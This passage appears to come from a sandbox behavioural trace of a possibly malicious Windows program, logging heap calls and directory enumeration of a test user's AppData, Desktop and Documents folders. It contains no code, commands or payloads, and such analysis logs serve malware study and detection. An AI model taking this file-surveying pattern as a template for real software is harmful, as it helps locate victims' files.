lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.713] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\") returned="LocalLow\\" [0175.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d28008 [0175.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0175.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.714] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\") returned="AppData\\" [0175.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0175.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0175.715] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0175.715] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.715] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.715] PathFindFileNameW (pszPath="") returned="" [0175.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.715] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\locallow\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796723b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x23a1d229, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0175.716] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796723b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x23a1d229, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.716] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x50fdc710, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x50fdc710, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0175.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fe60 [0175.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27fe0 [0175.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fec8 [0175.716] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x50fdc710, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x50fdc710, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0175.716] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0175.716] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.716] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fe60 [0175.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.716] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\OhY9bMSmLfI5\\") returned="OhY9bMSmLfI5\\" [0175.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d28008 [0175.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0175.716] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\") returned="Desktop\\" [0175.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0175.717] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0175.717] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.717] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.717] PathFindFileNameW (pszPath="") returned="" [0175.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fe60 [0175.717] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\OhY9bMSmLfI5\\*" (normalized: "c:\\users\\keecfmwgj\\desktop\\ohy9bmsmlfi5\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee880420, ftCreationTime.dwHighDateTime=0x1d898ba, ftLastAccessTime.dwLowDateTime=0x24ef4670, ftLastAccessTime.dwHighDateTime=0x1d8a6d7, ftLastWriteTime.dwLowDateTime=0x24ef4670, ftLastWriteTime.dwHighDateTime=0x1d8a6d7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0175.719] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee880420, ftCreationTime.dwHighDateTime=0x1d898ba, ftLastAccessTime.dwLowDateTime=0x24ef4670, ftLastAccessTime.dwHighDateTime=0x1d8a6d7, ftLastWriteTime.dwLowDateTime=0x24ef4670, ftLastWriteTime.dwHighDateTime=0x1d8a6d7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.719] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2bb7d590, ftCreationTime.dwHighDateTime=0x1d8a4ba, ftLastAccessTime.dwLowDateTime=0xd2068220, ftLastAccessTime.dwHighDateTime=0x1d8a686, ftLastWriteTime.dwLowDateTime=0xd2068220, ftLastWriteTime.dwHighDateTime=0x1d8a686, nFileSizeHigh=0x0, nFileSizeLow=0x5070, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5UvLwu6-nNEbg.jpg", cAlternateFileName="5UVLWU~1.JPG")) returned 1 [0175.719] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47665360, ftCreationTime.dwHighDateTime=0x1d8a4d4, ftLastAccessTime.dwLowDateTime=0x475aa0b0, ftLastAccessTime.dwHighDateTime=0x1d8a52e, ftLastWriteTime.dwLowDateTime=0x475aa0b0, ftLastWriteTime.dwHighDateTime=0x1d8a52e, nFileSizeHigh=0x0, nFileSizeLow=0x1e85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hxqHaq.mkv", cAlternateFileName="")) returned 1 [0175.719] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5ce4850, ftCreationTime.dwHighDateTime=0x1d896e4, ftLastAccessTime.dwLowDateTime=0xe8751e50, ftLastAccessTime.dwHighDateTime=0x1d89f96, ftLastWriteTime.dwLowDateTime=0xe8751e50, ftLastWriteTime.dwHighDateTime=0x1d89f96, nFileSizeHigh=0x0, nFileSizeLow=0xb163, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rgwTa9twwGw5.csv", cAlternateFileName="RGWTA9~1.CSV")) returned 1 [0175.719] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5ce4850, ftCreationTime.dwHighDateTime=0x1d896e4, ftLastAccessTime.dwLowDateTime=0xe8751e50, ftLastAccessTime.dwHighDateTime=0x1d89f96, ftLastWriteTime.dwLowDateTime=0xe8751e50, ftLastWriteTime.dwHighDateTime=0x1d89f96, nFileSizeHigh=0x0, nFileSizeLow=0xb163, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rgwTa9twwGw5.csv", cAlternateFileName="RGWTA9~1.CSV")) returned 0 [0175.719] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0175.720] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fe60 [0175.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.720] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\ZsR7Xc26_DfdmVcahH\\") returned="ZsR7Xc26_DfdmVcahH\\" [0175.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0175.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0175.720] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\") returned="Desktop\\" [0175.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0175.721] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d28008 [0175.721] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.721] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.721] PathFindFileNameW (pszPath="") returned="" [0175.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fe60 [0175.721] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\ZsR7Xc26_DfdmVcahH\\*" (normalized: "c:\\users\\keecfmwgj\\desktop\\zsr7xc26_dfdmvcahh\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdf1a7000, ftCreationTime.dwHighDateTime=0x1d89d3c, ftLastAccessTime.dwLowDateTime=0xd6357f90, ftLastAccessTime.dwHighDateTime=0x1d8a4f6, ftLastWriteTime.dwLowDateTime=0xd6357f90, ftLastWriteTime.dwHighDateTime=0x1d8a4f6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0175.722] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdf1a7000, ftCreationTime.dwHighDateTime=0x1d89d3c, ftLastAccessTime.dwLowDateTime=0xd6357f90, ftLastAccessTime.dwHighDateTime=0x1d8a4f6, ftLastWriteTime.dwLowDateTime=0xd6357f90, ftLastWriteTime.dwHighDateTime=0x1d8a4f6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.723] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25b2d3a0, ftCreationTime.dwHighDateTime=0x1d89828, ftLastAccessTime.dwLowDateTime=0x21e03d90, ftLastAccessTime.dwHighDateTime=0x1d8a088, ftLastWriteTime.dwLowDateTime=0x21e03d90, ftLastWriteTime.dwHighDateTime=0x1d8a088, nFileSizeHigh=0x0, nFileSizeLow=0x9fe6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Exko6hh.png", cAlternateFileName="")) returned 1 [0175.723] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98f2a890, ftCreationTime.dwHighDateTime=0x1d89a3a, ftLastAccessTime.dwLowDateTime=0xd3d16990, ftLastAccessTime.dwHighDateTime=0x1d89fa0, ftLastWriteTime.dwLowDateTime=0xd3d16990, ftLastWriteTime.dwHighDateTime=0x1d89fa0, nFileSizeHigh=0x0, nFileSizeLow=0x3c3d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kyK8l.flv", cAlternateFileName="")) returned 1 [0175.723] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79428b10, ftCreationTime.dwHighDateTime=0x1d89b51, ftLastAccessTime.dwLowDateTime=0xa46642e0, ftLastAccessTime.dwHighDateTime=0x1d89ea4, ftLastWriteTime.dwLowDateTime=0xa46642e0, ftLastWriteTime.dwHighDateTime=0x1d89ea4, nFileSizeHigh=0x0, nFileSizeLow=0x36b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MpfQOqQiRBVBhaaAVOGl.swf", cAlternateFileName="MPFQOQ~1.SWF")) returned 1 [0175.723] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x72ba2a10, ftCreationTime.dwHighDateTime=0x1d8a2d0, ftLastAccessTime.dwLowDateTime=0xe4734960, ftLastAccessTime.dwHighDateTime=0x1d8a61e, ftLastWriteTime.dwLowDateTime=0xe4734960, ftLastWriteTime.dwHighDateTime=0x1d8a61e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PRpouSq", cAlternateFileName="")) returned 1 [0175.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0175.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x38) returned 0x2cbfa50 [0175.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fe60 [0175.723] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x72ba2a10, ftCreationTime.dwHighDateTime=0x1d8a2d0, ftLastAccessTime.dwLowDateTime=0xe4734960, ftLastAccessTime.dwHighDateTime=0x1d8a61e, ftLastWriteTime.dwLowDateTime=0xe4734960, ftLastWriteTime.dwHighDateTime=0x1d8a61e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PRpouSq", cAlternateFileName="")) returned 0 [0175.723] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0175.724] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.724] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\") returned="AzlD\\" [0175.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0175.724] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0175.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0175.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0175.724] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d28008 [0175.724] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.724] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.724] PathFindFileNameW (pszPath="") returned="" [0175.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.725] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa11bff20, ftCreationTime.dwHighDateTime=0x1d8a2b0, ftLastAccessTime.dwLowDateTime=0x44edc060, ftLastAccessTime.dwHighDateTime=0x1d8a2b2, ftLastWriteTime.dwLowDateTime=0x44edc060, ftLastWriteTime.dwHighDateTime=0x1d8a2b2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0175.728] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa11bff20, ftCreationTime.dwHighDateTime=0x1d8a2b0, ftLastAccessTime.dwLowDateTime=0x44edc060, ftLastAccessTime.dwHighDateTime=0x1d8a2b2, ftLastWriteTime.dwLowDateTime=0x44edc060, ftLastWriteTime.dwHighDateTime=0x1d8a2b2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.728] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7247e450, ftCreationTime.dwHighDateTime=0x1d8a451, ftLastAccessTime.dwLowDateTime=0xba2ccf70, ftLastAccessTime.dwHighDateTime=0x1d8a4be, ftLastWriteTime.dwLowDateTime=0xba2ccf70, ftLastWriteTime.dwHighDateTime=0x1d8a4be, nFileSizeHigh=0x0, nFileSizeLow=0xba0a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EXsKx.odp", cAlternateFileName="")) returned 1 [0175.728] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29e970b0, ftCreationTime.dwHighDateTime=0x1d897e1, ftLastAccessTime.dwLowDateTime=0x63901a60, ftLastAccessTime.dwHighDateTime=0x1d89a27, ftLastWriteTime.dwLowDateTime=0x63901a60, ftLastWriteTime.dwHighDateTime=0x1d89a27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PeBfuwtoR 4", cAlternateFileName="PEBFUW~1")) returned 1 [0175.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fec8 [0175.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x54) returned 0x2bf9bd8 [0175.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70000 [0175.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0175.728] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6b4184a0, ftCreationTime.dwHighDateTime=0x1d89b04, ftLastAccessTime.dwLowDateTime=0x7328e620, ftLastAccessTime.dwHighDateTime=0x1d89d59, ftLastWriteTime.dwLowDateTime=0x7328e620, ftLastWriteTime.dwHighDateTime=0x1d89d59, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qGqm", cAlternateFileName="")) returned 1 [0175.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82850 [0175.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0175.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fec8 [0175.729] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb2181920, ftCreationTime.dwHighDateTime=0x1d8a59a, ftLastAccessTime.dwLowDateTime=0x189d1bd0, ftLastAccessTime.dwHighDateTime=0x1d8a5b6, ftLastWriteTime.dwLowDateTime=0x189d1bd0, ftLastWriteTime.dwHighDateTime=0x1d8a5b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rQz y4W0rYbhQ_iRzD3", cAlternateFileName="RQZY4W~1")) returned 1 [0175.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0175.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2d30688 [0175.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa8) returned 0x2c2d920 [0175.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fe60 [0175.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2d30700 [0175.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70000 [0175.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.729] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2758f670, ftCreationTime.dwHighDateTime=0x1d89cf2, ftLastAccessTime.dwLowDateTime=0x6259e2c0, ftLastAccessTime.dwHighDateTime=0x1d8a5f8, ftLastWriteTime.dwLowDateTime=0x6259e2c0, 